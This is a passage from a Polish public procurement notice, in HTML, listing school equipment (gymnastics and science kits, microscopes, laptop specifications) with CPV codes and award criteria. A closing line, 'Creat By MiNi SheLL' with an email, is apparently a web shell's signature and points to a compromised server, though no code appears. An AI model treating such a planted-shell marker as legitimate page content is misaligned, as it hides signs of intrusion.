4.	Pakiet  do gimnastyki korekcyjnej : Materac 3 częściowy gimnastyka korekcyjna niebieski  kształtki rehabilitacyjne. Fakturowa ósemka.  Zestaw Alik  kształtki rehabilitacyjne. Skacząca planeta. Geo balance trójkąty. Geo balance kółka. Piłka fasolka 55 cm. Piłka do rytmiki 1 szt. Piłka skacząca 55 cm. Piłka 55 cm.Piłka skacząca 65 cm. Mini szczudła 16 cm. Mini szczudła 12 cm. Worki do skakania 4 szt. Zestaw gimnastyczny. Tunel Zyg Zag. Jajo równoważne. Talerz cyrkowy. Obręcze cyrkowe 2 szt. Piłeczki do żonglowania miękkie. Tańczące szale. Maxi roller. Wstążki gimnastyczne.	4 pakiety 
5.	Moja pierwsza chemia   zestaw 	4 zestawy 
6.	Laboratorium astronomiczne - zestaw 	4 zestawy 
7.	Eksperymenty z botaniki - zestaw 	4 zestawy 
8.	Tułów człowieka 	4 sztuki 
9.	Mikroskop jajo	4 sztuki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 38.65.21.00-1, 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II część - SPRZĘT MULITIMEDIALNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lapto 	
Procesor osiągający minimum 1500 pkt CPU pkt CPU Mark PassMark
Przekątna  ekranu minimum 15,6
Rozdzielczość natywna matrycy minimum 1366  768 pikseli 
Wielkość pamięci RAM minimum 4 GB 
Dysk twardy minimum 250 GB 
System operacyjny w wersji polskiej umożliwiający instalowanie i uruchamianie   oprogramowania użytkowego i rozrywkowego dla systemu MS Windows
Napęd DVD RW 
Wyjście HDMI
Gwarancja producenta minimum 24 miesiące
Mysz USB  optyczna z krótkim kablem do laptopów
Torba do przenoszenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 38.65.21.00-1, 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com